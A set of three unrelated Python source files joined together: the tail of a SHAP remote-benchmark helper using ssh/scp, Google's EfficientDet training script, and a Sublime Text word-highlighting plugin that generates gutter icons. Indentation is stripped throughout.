with open(cache_file, "rb") as f:
return pickle.load(f)
# this is just so we don't dump everything at once on a machine
time.sleep(random.uniform(0,5))
# run the benchmark on the remote machine
#start = time.time()
cmd = "CUDA_VISIBLE_DEVICES=\"\" "+python_binary+" -c \"import shap; shap.benchmark.run_experiment(['%s', '%s', '%s', '%s'], cache_dir='%s')\" &> %s/%s.output" % (
dataset_name, model_name, method_name, metric_name, cache_dir, cache_dir, cache_id
)
try:
subprocess.check_output(["ssh", remote, cmd])
except subprocess.CalledProcessError as e:
print("The following command failed on %s:" % remote, file=sys.stderr)
print(cmd, file=sys.stderr)
total_failed += 1
print(e)
return
# copy the results back
subprocess.check_output(["scp", remote+":"+cache_file, cache_file])
if os.path.isfile(cache_file):
with open(cache_file, "rb") as f:
#print(cache_id.replace("__", " ") + " ...loaded from remote after %f seconds" % (time.time() - start))
return pickle.load(f)
else:
raise Exception("Remote benchmark call finished but no local file was found!")
def __gen_cache_id(experiment):
dataset_name, model_name, method_name, metric_name = experiment
return "v" + "__".join([__version__, dataset_name, model_name, method_name, metric_name])
|
main.py
|
# Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import multiprocessing
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
from tensorflow.python.ops import custom_gradient # pylint:disable=g-direct-tensorflow-import
from tensorflow.python.framework import ops # pylint:disable=g-direct-tensorflow-import
def get_variable_by_name(var_name):
"""Given a variable name, retrieves a handle on the tensorflow Variable."""
global_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def _filter_fn(item):
try:
return var_name == item.op.name
except AttributeError:
# Collection items without operation are ignored.
return False
candidate_vars = list(filter(_filter_fn, global_vars))
if len(candidate_vars) >= 1:
# Filter out non-trainable variables.
candidate_vars = [v for v in candidate_vars if v.trainable]
else:
raise ValueError("Unsuccessful at finding variable {}.".format(var_name))
if len(candidate_vars) == 1:
return candidate_vars[0]
elif len(candidate_vars) > 1:
raise ValueError(
"Unsuccessful at finding trainable variable {}. "
"Number of candidates: {}. "
"Candidates: {}".format(var_name, len(candidate_vars), candidate_vars))
else:
# The variable is not trainable.
return None
custom_gradient.get_variable_by_name = get_variable_by_name
import tensorflow.compat.v1 as tf
tf.disable_eager_execution()
import dataloader
import det_model_fn
import hparams_config
import utils
flags.DEFINE_string(
'tpu',
default=None,
help='The Cloud TPU to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url.')
flags.DEFINE_string(
'gcp_project',
default=None,
help='Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
'tpu_zone',
default=None,
help='GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'gpus', ''],
'Training: gpus for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
'use_xla', False,
'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
'and this flag has no effect.')
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
'initialization.')
flags.DEFINE_string('ckpt', None,
'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
' containing attributes to use as hyperparameters.')
flags.DEFINE_integer(
'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
'num_cores_per_replica',
default=2,
help='Number of TPU cores per replica when using spatial partition.')
flags.DEFINE_multi_integer(
'input_partition_dims', [1, 2, 1, 1],
'A list that describes the partition dims for all the tensors.')
flags.DEFINE_integer('train_batch_size', 64, 'global training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'global evaluation batch size')
flags.DEFINE_integer('eval_samples', 5000, 'Number of samples for eval.')
flags.DEFINE_integer('iterations_per_loop', 100,
'Number of iterations per TPU training loop')
flags.DEFINE_integer('save_checkpoints_steps', 100,
'Number of iterations per checkpoint save')
flags.DEFINE_string(
'train_file_pattern', None,
'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('val_file_pattern', None,
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
'val_json_file', None,
'COCO validation JSON containing golden bounding boxes. If None, use the '
'ground truth from the dataloader. Ignored if testdev_dir is not None.')
flags.DEFINE_string('testdev_dir', None,
'COCO testdev dir. If not None, ignorer val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_enum('mode', 'train', ['train', 'eval', 'train_and_eval'],
'Mode to run: train, eval or train_and_eval')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_train', False, 'Run one eval after the '
'training finishes.')
flags.DEFINE_bool('profile', False, 'Profile training performance.')
flags.DEFINE_integer(
'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 180,
'Minimum seconds between evaluations.')
flags.DEFINE_integer(
'eval_timeout', None,
'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
flags.DEFINE_bool(
'run_epoch_in_child_process', False,
'This option helps to rectify CPU memory leak. If True, every epoch is '
'run in a separate process for train and eval and memory will be cleared.'
'Drawback: need to kill 2 processes if trainining needs to be interrupted.')
FLAGS = flags.FLAGS
def main(_):
if FLAGS.strategy == 'tpu':
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
tpu_grpc_url = tpu_cluster_resolver.get_master()
tf.Session.reset(tpu_grpc_url)
else:
tpu_cluster_resolver = None
# Check data path
if FLAGS.mode in ('train', 'train_and_eval'):
if FLAGS.train_file_pattern is None:
raise RuntimeError('Must specify --train_file_pattern for train.')
if FLAGS.mode in ('eval', 'train_and_eval'):
if FLAGS.val_file_pattern is None:
raise RuntimeError('Must specify --val_file_pattern for eval.')
# Parse and override hparams
config = hparams_config.get_detection_config(FLAGS.model_name)
config.override(FLAGS.hparams)
if FLAGS.num_epochs: # NOTE: remove this flag after updating all docs.
config.num_epochs = FLAGS.num_epochs
# Parse image size in case it is in string format.
config.image_size = utils.parse_image_size(config.image_size)
# The following is for spatial partitioning. `features` has one tensor while
# `labels` had 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
# partition is performed on `features` and all partitionable tensors of
# `labels`, see the partition logic below.
# In the TPUEstimator context, the meaning of `shard` and `replica` is the
# same; follwing the API, here has mixed use of both.
if FLAGS.use_spatial_partition:
# Checks input_partition_dims agrees with num_cores_per_replica.
if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
raise RuntimeError('--num_cores_per_replica must be a product of array'
'elements in --input_partition_dims.')
labels_partition_dims = {
'mean_num_positives': None,
'source_ids': None,
'groundtruth_data': None,
'image_scales': None,
'image_masks': None,
}
# The Input Partition Logic: We partition only the partition-able tensors.
feat_sizes = utils.get_feat_sizes(
config.get('image_size'), config.get('max_level'))
for level in range(config.get('min_level'), config.get('max_level') + 1):
def _can_partition(spatial_dim):
partitionable_index = np.where(
spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)
spatial_dim = feat_sizes[level]
if _can_partition(spatial_dim['height']) and _can_partition(
spatial_dim['width']):
labels_partition_dims['box_targets_%d' %
level] = FLAGS.input_partition_dims
labels_partition_dims['cls_targets_%d' %
level] = FLAGS.input_partition_dims
else:
labels_partition_dims['box_targets_%d' % level] = None
labels_partition_dims['cls_targets_%d' % level] = None
num_cores_per_replica = FLAGS.num_cores_per_replica
input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
num_shards = FLAGS.num_cores // num_cores_per_replica
else:
num_cores_per_replica = None
input_partition_dims = None
num_shards = FLAGS.num_cores
params = dict(
config.as_dict(),
model_name=FLAGS.model_name,
iterations_per_loop=FLAGS.iterations_per_loop,
model_dir=FLAGS.model_dir,
num_shards=num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
strategy=FLAGS.strategy,
backbone_ckpt=FLAGS.backbone_ckpt,
ckpt=FLAGS.ckpt,
val_json_file=FLAGS.val_json_file,
testdev_dir=FLAGS.testdev_dir,
profile=FLAGS.profile,
mode=FLAGS.mode)
config_proto = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False)
if FLAGS.strategy != 'tpu':
if FLAGS.use_xla:
config_proto.graph_options.optimizer_options.global_jit_level = (
tf.OptimizerOptions.ON_1)
config_proto.gpu_options.allow_growth = True
model_dir = FLAGS.model_dir
model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
max_instances_per_image = config.max_instances_per_image
if FLAGS.eval_samples:
eval_steps = int((FLAGS.eval_samples + FLAGS.eval_batch_size - 1) //
FLAGS.eval_batch_size)
else:
eval_steps = None
total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
train_steps = total_examples // FLAGS.train_batch_size
logging.info(params)
if not tf.io.gfile.exists(model_dir):
tf.io.gfile.makedirs(model_dir)
config_file = os.path.join(model_dir, 'config.yaml')
if not tf.io.gfile.exists(config_file):
tf.io.gfile.GFile(config_file, 'w').write(str(config))
train_input_fn = dataloader.InputReader(
FLAGS.train_file_pattern,
is_training=True,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
eval_input_fn = dataloader.InputReader(
FLAGS.val_file_pattern,
is_training=False,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
if FLAGS.strategy == 'tpu':
tpu_config = tf.estimator.tpu.TPUConfig(
FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
num_cores_per_replica=num_cores_per_replica,
input_partition_dims=input_partition_dims,
per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
.PER_HOST_V2)
run_config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=model_dir,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
tpu_config=tpu_config,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
# TPUEstimator can do both train and eval.
train_est = tf.estimator.tpu.TPUEstimator(
model_fn=model_fn_instance,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size,
config=run_config,
params=params)
eval_est = train_est
else:
strategy = None
if FLAGS.strategy == 'gpus':
strategy = tf.distribute.MirroredStrategy()
run_config = tf.estimator.RunConfig(
model_dir=model_dir,
train_distribute=strategy,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
def get_estimator(global_batch_size):
params['num_shards'] = getattr(strategy, 'num_replicas_in_sync', 1)
params['batch_size'] = global_batch_size // params['num_shards']
return tf.estimator.Estimator(
model_fn=model_fn_instance, config=run_config, params=params)
# train and eval need different estimator due to different batch size.
train_est = get_estimator(FLAGS.train_batch_size)
eval_est = get_estimator(FLAGS.eval_batch_size)
# start train/eval flow.
if FLAGS.mode == 'train':
train_est.train(input_fn=train_input_fn, max_steps=train_steps)
if FLAGS.eval_after_train:
eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
elif FLAGS.mode == 'eval':
# Run evaluation when there's a new checkpoint
for ckpt in tf.train.checkpoints_iterator(
FLAGS.model_dir,
min_interval_secs=FLAGS.min_eval_interval,
timeout=FLAGS.eval_timeout):
logging.info('Starting to evaluate.')
try:
eval_results = eval_est.evaluate(eval_input_fn, steps=eval_steps)
# Terminate eval job when final checkpoint is reached.
try:
current_step = int(os.path.basename(ckpt).split('-')[1])
except IndexError:
logging.info('%s has no global step info: stop!', ckpt)
break
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
if current_step >= train_steps:
logging.info('Eval finished step %d/%d', current_step, train_steps)
break
except tf.errors.NotFoundError:
# Checkpoint might be not already deleted by the time eval finished.
# We simply skip ssuch case.
logging.info('Checkpoint %s no longer exists, skipping.', ckpt)
elif FLAGS.mode == 'train_and_eval':
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
try:
step = int(os.path.basename(ckpt).split('-')[1])
current_epoch = (
step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
except (IndexError, TypeError):
logging.info('Folder %s has no ckpt with valid step.', FLAGS.model_dir)
current_epoch = 0
def run_train_and_eval(e):
print('\n =====> Starting training, epoch: %d.' % e)
train_est.train(
input_fn=train_input_fn,
max_steps=e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
print('\n =====> Starting evaluation, epoch: %d.' % e)
eval_results = eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
epochs_per_cycle = 1 # higher number has less graph construction overhead.
for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
if FLAGS.run_epoch_in_child_process:
p = multiprocessing.Process(target=run_train_and_eval, args=(e,))
p.start()
p.join()
if p.exitcode != 0:
return p.exitcode
else:
tf.reset_default_graph()
run_train_and_eval(e)
else:
logging.info('Invalid mode: %s', FLAGS.mode)
if __name__ == '__main__':
app.run(main)
|
CustomHighlighter.py
|
import re
import os
import time
import zlib
import struct
import threading
from functools import partial
import sublime
import sublime_plugin
from .settings import Settings, SettingTogglerCommandMixin
from .colorizer import SchemaColorizer
# if $$highlighter$$ is colored in this comment
# then no colors have been configured
NAME = "Custom Highlighter"
regex_cache = None
re_cache = None
fallback_colors = {
"$$highlighter$$": "#ffd700", # fallback placeholder
}
def regex_factory():
global regex_cache
if regex_cache != None:
colors_regex, colors_regex_capture = regex_cache
else:
colors = settings.get('colors', {})
if not colors:
colors = fallback_colors
# print({
# "colors": colors,
# })
colors_regex = r'(%s)' % r'(?<![-.\w])%s(?![-.\w])' % r'(?![-.\w])|(?<![-.\w])'.join(map(lambda key: re.escape(key), colors.keys()))
# print({
# "colors_regex": colors_regex,
# })
# colors_regex = []
# if simple_colors:
# colors_regex = r'(%s)' % colors_regex
# colors_regex = r'|'.join(colors_regex)
colors_regex_capture = r'\1'
# if len(colors_regex):
# colors_regex_capture = r'|\1'
# else:
# colors_regex_capture = ''
regex_cache = colors_regex, colors_regex_capture
# print({
# "regex_cache": regex_cache,
# })
return colors_regex, colors_regex_capture
def re_factory():
global re_cache
if re_cache != None:
colors_re, colors_re_capture = re_cache
else:
colors_regex, colors_regex_capture = regex_factory()
colors_re = re.compile(colors_regex)
colors_re_capture = re.sub(r'\\([0-9])', lambda m: chr(int(m.group(1))), colors_regex_capture)
re_cache = colors_re, colors_re_capture
return colors_re, colors_re_capture
# Full PNG is: PNG_HEAD + PNG_IHDR + PNG_IDAT[mode] + PNG_IEND
PNG_HEAD = b'\x89PNG\r\n\x1a\n'
PNG_IHDR = b'\x00\x00\x00\x0dIHDR\x00\x00\x00 \x00\x00\x00 \x08\x06\x00\x00\x00szz\xf4'
PNG_IDAT = {
'circle': b'\x00\x00\x01\x13IDATx\x9c\xed\xd6\xc1\r\xc3 \x0c@QX!g\xa4\x8c\xd0\x11:BF\xe8\x01q\xee\x1c\xdd\x82e2\x00\xb30\x00\xb5U#U\x11\x85`\xac\xe6\xc2\xe1_\xc3K\x93\xd8U)%ue\x97\x1e>\x01\x13P\x05\xac\xb7{)\x03Y\xc8C\x01\x8a\xdb\xe3\x89\x05\xc8C\x162\x90:6\n\xd0\x90\x83v(}\x07\x17?\xb6C\x0e\xd2R\x80\x05z\x1d\x0f\xae\x00r/h\x19\x05\xe8\xda\xe1\r@F\xe8\x11\x80\xab\x1d~\x02\x90\xe8q\xb0\x00\xa6\xf4\xcc\x19\x00|\'\x0c\x07`[\x87\x9f\x04`\x96\x03\xf0\x82\x00\xcf\x01\x04A@\xe0\x00\xa2 v\x03h\xc25/~\x06\x897\xc3\x01\x04A@\xff#\xa0\xd9.\x05\xe8\x7f\ti\xb1H\x01\xfa?\xc3\xed\xb3\xd5v\x01\x00\x0e\xb3\xfeADK\xc4\t\x00p\x9c\xf7\x8fb\x02hZ(\\\x00.2=\x02\xc0\x96\x1a\xa2q8\xaer5\n\xc8\xbf\x84+\xbd\x13?\x9e\xb9\xcbw.\x05\xc8\x19\xfa:<\xcd\x89H\x133\xd0\xee\xc0\x05f\xd6\xc2\xdf\xb9n\xc0\xbf\x9a\x80\t\xb8\x1c\xf0\x06-\x9f\xcd\xf4\x17\xe9(\x03',
'square': b'\x00\x00\x00\x4aIDATx\x9c\xed\xceA\r\x00 \x0cC\xd19A\x02\x12\x90\x80\x04$\xe0\xff\xd49 =\xb1,\xf9\x87\x7fm_H\x8a\xcaJ\xcf\x01\x00x\x02\xc6\\r\xda\xe7Z\x01\x00\x00\x00@?\x80;\xecB\x01\x00\x00\x00\xa0\x1f\xe0W\x00\x00\x94\x03\x12\\\xf0$\x87\xd4i\x0c\x98',
'fill': b'\x00\x00\x00\x40IDATx\x9c\xed\xcf1\x11\x00 \x10\x03\xc1w\x82\x04$ \x01\tH\xc0\x7f\x05"R|\xb3\xc5\xb5\x99M\x8d\xb9^\xd2>7\xaa\x00\x00\x00\x00\x00\x00\x00\xda\x01\xe9@z\x00\x00\x00\x00\x00\x00\x00\xa0\x1d\xf0\x01\xb4]Pj]\x9av\xf7',
}
PNG_IEND = b'\x00\x00\x00\x00IEND\xaeB`\x82'
PNG_RE = re.compile(b'\\x1f\\x2f\\x3f|\\x4f\\x5f\\x6f')
PNG_DATA = {
'circle': zlib.decompress(PNG_IDAT['circle'][8:-4]),
'square': zlib.decompress(PNG_IDAT['square'][8:-4]),
'fill': zlib.decompress(PNG_IDAT['fill'][8:-4]),
}
DEFAULT_GUTTER_ICON = 'circle'
def toicon(name, gutter_icon=True, light=True):
base_path = os.path.join(sublime.packages_path(), 'User', '%s.cache' % NAME)
if not os.path.exists(base_path):
os.mkdir(base_path)
if gutter_icon not in PNG_DATA:
gutter_icon = DEFAULT_GUTTER_ICON
icon_path = os.path.join(base_path, name + '_' + gutter_icon + '.png')
if not os.path.exists(icon_path):
r = int(name[4:6], 16)
g = int(name[6:8], 16)
b = int(name[8:10], 16)
a = int(name[10:12] or 'ff', 16) / 255.0
# print("r={} g={} b={} a={}".format(r, g, b, a))
if light:
x = 0xff * (1 - a)
y = 0xcc * (1 - a)
else:
x = 0x99 * (1 - a)
y = 0x66 * (1 - a)
r *= a
g *= a
b *= a
# print("x(r={} g={} b={}), y(r={} g={} b={})".format(int(r + x), int(g + x), int(b + x), int(r + y), int(g + y), int(b + y)))
I1 = lambda v: struct.pack("!B", v & (2**8 - 1))
I4 = lambda v: struct.pack("!I", v & (2**32 - 1))
png = PNG_HEAD + PNG_IHDR
col_map = {
b'\x1f\x2f\x3f': I1(int(r + x)) + I1(int(g + x)) + I1(int(b + x)),
b'\x4f\x5f\x6f': I1(int(r + y)) + I1(int(g + y)) + I1(int(b + y)),
}
data = PNG_RE.sub(lambda m: col_map[m.group(0)], PNG_DATA[gutter_icon])
compressed = zlib.compress(data)
idat = b'IDAT' + compressed
png += I4(len(compressed)) + idat + I4(zlib.crc32(idat))
png += PNG_IEND
with open(icon_path, 'wb') as fp:
fp.write(png)
relative_icon_path = os.path.relpath(icon_path, os.path.dirname(sublime.packages_path()))
relative_icon_path = relative_icon_path.replace('\\', '/')
return relative_icon_path
# Commands
class CustomHighlighterCommand(sublime_plugin.WindowCommand):
def run_(self, edit_token, args={}):
view = self.window.active_view()
view.run_command('custom_highlighter', args)
def is_enabled(self):
return True
class CustomHighlighterEnableLoadSaveCommand(CustomHighlighterCommand):
def is_enabled(self):
enabled = super(CustomHighlighterEnableLoadSaveCommand, self).is_enabled()
if enabled:
if settings.get('highlight') == 'load-save':
return False
return enabled
class CustomHighlighterEnableSaveOnlyCommand(CustomHighlighterCommand):
def is_enabled(self):
enabled = super(CustomHighlighterEnableSaveOnlyCommand, self).is_enabled()
if enabled:
if settings.get('highlight') == 'save-only':
return False
return enabled
class CustomHighlighterDisableCommand(CustomHighlighterCommand):
def is_enabled(self):
enabled = super(CustomHighlighterDisableCommand, self).is_enabled()
if enabled:
if settings.get('highlight') is False:
return False
return enabled
class CustomHighlighterEnableCommand(CustomHighlighterCommand):
def is_enabled(self):
view = self.window.active_view()
if view:
if settings.get('highlight') is not False:
return False
return True
# command to restore color scheme
class CustomHighlighterRestoreCommand(sublime_plugin.TextCommand):
def run(self, edit):
erase_highlight_colors()
colorizer.restore_color_scheme()
all_regs = []
class CustomHighlighterCommand(sublime_plugin.TextCommand):
'''command to interact with linters'''
def __init__(self, view):
self.view = view
self.help_called = False
def run_(self, edit_token, args={}):
'''method called by default via view.run_command;
used to dispatch to appropriate method'''
action = args.get('action', '')
if not action:
return
lc_action = action.lower()
# print({
# "lc_action": lc_action,
# })
if lc_action == 'reset':
self.reset()
elif lc_action == 'off':
self.off()
elif lc_action == 'on':
self.on()
elif lc_action == 'load-save':
self.enable_load_save()
elif lc_action == 'save-only':
self.enable_save_only()
else:
highlight_colors(self.view)
def reset(self):
'''Removes existing lint marks and restores user settings.'''
erase_highlight_colors()
TIMES.clear()
colorizer.setup_color_scheme(self.view.settings())
queue_highlight_colors(self.view, preemptive=True)
def on(self):
'''Turns background linting on.'''
settings.set('highlight', True)
settings.save()
queue_highlight_colors(self.view, preemptive=True)
def enable_load_save(self):
'''Turns load-save linting on.'''
settings.set('highlight', 'load-save')
settings.save()
erase_highlight_colors()
def enable_save_only(self):
'''Turns save-only linting on.'''
settings.set('highlight', 'save-only')
settings.save()
erase_highlight_colors()
def off(self):
'''Turns background linting off.'''
settings.set('highlight', False)
settings.save()
erase_highlight_colors()
class CustomHighlighterViewEventListener(sublime_plugin.ViewEventListener):
def on_modified(self):
if settings.get('highlight') is not True:
return
action = self.view.command_history(0, True)[0]
if action == 'revert':
erase_highlight_colors()
queue_highlight_colors(self.view, preemptive=True)
else:
selection = action != 'paste'
queue_highlight_colors(self.view, preemptive=selection, selection=selection)
def on_close(self):
vid = self.view.id()
if vid in TIMES:
del TIMES[vid]
if vid in CUSTOM_HIGHLIGHTS:
del CUSTOM_HIGHLIGHTS[vid]
def on_activated(self):
if self.view.file_name() is None:
return
vid = self.view.id()
if vid in TIMES:
return
TIMES[vid] = 100
if settings.get('highlight') in (False, 'save-only'):
return
queue_highlight_colors(self.view, preemptive=True)
def on_post_save(self):
if settings.get('highlight') is False:
return
queue_highlight_colors(self.view, preemptive=True)
def on_selection_modified(self):
delay_queue(1000) # on movement, delay queue (to make movement responsive)
TIMES = {} # collects how long it took the color highlight to complete
CUSTOM_HIGHLIGHTS = {} # Highlighted regions
def erase_highlight_colors(view=None):
if view:
vid = view.id()
if vid in CUSTOM_HIGHLIGHTS:
for name in CUSTOM_HIGHLIGHTS[vid]:
view.erase_regions(name)
view.erase_regions(name + '_icon')
CUSTOM_HIGHLIGHTS[vid] = set()
else:
for window in sublime.windows():
for view in window.views():
erase_highlight_colors(view)
def highlight_colors(view, selection=False, **kwargs):
view_settings = view.settings()
colorizer.setup_color_scheme(view_settings)
vid = view.id()
start = time.time()
if len(view.sel()) > 100:
selection = False
if selection:
selected_lines = [ln for r in view.sel() for ln in view.lines(r)]
elif view.size() > 512000:
selected_lines = view.lines(view.visible_region())
else:
selected_lines = None
words = {}
found = []
if selected_lines:
colors_re, colors_re_capture = re_factory()
matches = [colors_re.finditer(view.substr(l)) for l in selected_lines]
matches = [
(
sublime.Region(
selected_lines[i].begin() + m.start(),
selected_lines[i].begin() + m.end()
),
m.groups()
) if m else (None, None)
for i, am in enumerate(matches) for m in am
]
matches = [
(
rg,
''.join(
gr[ord(g) - 1] or '' if ord(g) < 10 else g for g in colors_re_capture
)
)
for rg, gr in matches if rg
]
if matches:
ranges, found = zip(*[q for q in matches if q])
else:
ranges = []
else:
colors_regex, colors_regex_capture = regex_factory()
# print({
# "colors_regex_a": colors_regex,
# "colors_regex_capture": colors_regex_capture,
# })
ranges = view.find_all(colors_regex, 0, colors_regex_capture, found)
# print({
# 'found': found,
# })
colors = settings.get('colors', {})
if not colors:
colors = fallback_colors
# print({
# "colors": colors,
# })
for i, col in enumerate(found):
# mode, _, col = col.partition('|')
# print(col)
# col = col.rstrip(',')
# print(col)
# col = col.split(',')
# print(mode, _, col)
try:
# In the form of: black, #FFFFFFFF
# col0 = col[0]
# col0 = all_names_to_hex.get(col0.lower(), col0.upper())
color = colors[col].upper()
# print({col: color})
if len(color) == 4: #abc
color = '#' + color[1] * 2 + color[2] * 2 + color[3] * 2 + 'FF'
elif len(color) == 5: #abcd
color = '#' + color[1] * 2 + color[2] * 2 + color[3] * 2 + color[4] * 2
elif len(color) == 7: #aabbcc
color += 'FF'
if re.match(r'^#[A-F0-9]{8}$', color) == None:
raise ValueError('Invalid color format "%s"' % color)
# except (ValueError, IndexError, KeyError) as e:
except (KeyError, ValueError) as e:
# print({
# type(e): e,
# })
continue
# Fix case when color it's the same as background color:
if hasattr(view, 'style'):
bg_col = (view.style()['background'] + 'FF')[:9].upper()
if col == bg_col:
br = int(bg_col[1:3], 16)
bg = int(bg_col[3:5], 16)
bb = int(bg_col[5:7], 16)
ba = int(bg_col[7:9], 16)
br += -1 if br > 1 else 1
bg += -1 if bg > 1 else 1
bb += -1 if bb > 1 else 1
col = '#%02X%02X%02X%02X' % (br, bg, bb, ba)
# print(colorizer)
name = colorizer.add_color(col, colors)
# print({
# "name": name,
# })
if name not in words:
words[name] = [ranges[i]]
else:
words[name].append(ranges[i])
colorizer.update(view)
if selected_lines:
if vid not in CUSTOM_HIGHLIGHTS:
CUSTOM_HIGHLIGHTS[vid] = set()
for name in CUSTOM_HIGHLIGHTS[vid]:
ranges = []
affected_line = False
for _range in view.get_regions(name):
_line_range = False
for _line in selected_lines:
if _line.contains(_range):
_line_range = True
break
if _line_range:
affected_line = True
else:
ranges.append(_range)
if affected_line or name in words:
if name not in words:
words[name] = ranges
else:
words[name].extend(ranges)
else:
erase_highlight_colors(view)
all_regs = CUSTOM_HIGHLIGHTS[vid]
highlight_values = bool(settings.get('highlight_values', True))
gutter_icon = settings.get('gutter_icon', True)
for name, w in words.items():
# print(name, w)
if highlight_values:
view.add_regions(name, w, name, flags=sublime.PERSISTENT)
if gutter_icon:
wi = [sublime.Region(i, i) for i in set(view.line(r).a for r in w)]
view.add_regions(name + '_icon', wi, '%sgutter' % colorizer.prefix, icon=toicon(name, gutter_icon=gutter_icon), flags=sublime.PERSISTENT)
all_regs.add(name)
if not selection:
TIMES[vid] = (time.time() - start) * 1000 # Keep how long it took to do a full color highlight
# print('highlight took %s' % TIMES[vid])
################################################################################
# Queue connection
QUEUE = {} # views waiting to be processed by Color Highlight
# For snappier color highlighting, different delays are used for different color highlighting times:
# (color_highlighting_time, (delay, delay_when_busy))
DELAYS = (
(50, (50, 100)),
(100, (100, 300)),
(200, (200, 500)),
(400, (400, 1000)),
(600, (600, 1500)),
(800, (800, 2000)),
(1200, (1200, 1000)),
(1600, (1600, 3000)),
)
def get_delay(t, view):
delays = 0
for _t, d in DELAYS:
if _t <= t:
delays = d
else:
break
delays = delays or DELAYS[0][1]
# If the user specifies a delay greater than the built in delay,
# figure they only want to see marks when idle.
min_delay = int(settings.get('delay', 0) * 1000)
return (min_delay, min_delay) if min_delay > delays[1] else delays
def _update_view(view, filename, **kwargs):
# It is possible that by the time the queue is run,
# the original file is no longer being displayed in the view,
# or the view may be gone. This happens especially when
# viewing files temporarily by single-clicking on a filename
# in the sidebar or when selecting a file through the choose file palette.
valid_view = False
view_id = view.id()
if view.is_loading():
return
if (view.file_name() or '').encode('utf-8') != filename:
return
for window in sublime.windows():
for v in window.views():
if v.id() == view_id:
valid_view = True
break
if not valid_view:
return
highlight_colors(view, **kwargs)
def queue_highlight_colors(view, delay=-1, preemptive=False, **kwargs):
'''Put the current view in a queue to be examined by a Color Highlight'''
if preemptive:
delay = delay_when_busy = 0
elif delay == -1:
delay, delay_when_busy = get_delay(TIMES.get(view.id(), 100), view)
else:
delay_when_busy = delay
kwargs.update({
'delay': delay,
'delay_when_busy': delay_when_busy,
'preemptive': preemptive,
})
queue(view, partial(_update_view, view, (view.file_name() or '').encode('utf-8'), **kwargs), kwargs)
def _callback(view, filename, kwargs):
kwargs['callback'](view, filename, **kwargs)
def background_custom_highlighter():
__lock_.acquire()
try:
callbacks = list(QUEUE.values())
QUEUE.clear()
finally:
__lock_.release()
for callback in callbacks:
sublime.set_timeout(callback, 0)
################################################################################
# Queue dispatcher system:
queue_dispatcher = background_custom_highlighter
queue_thread_name = 'background custom highlighter'
MAX_DELAY = 10
def queue_loop():
'''An infinite loop running the color highlight in a background thread meant to
update the view after user modifies it and then does no further
modifications for some time as to not slow down the UI with color highlighting.'''
global __signaled_, __signaled_first_
while __loop_:
# print('acquire...')
__semaphore_.acquire()
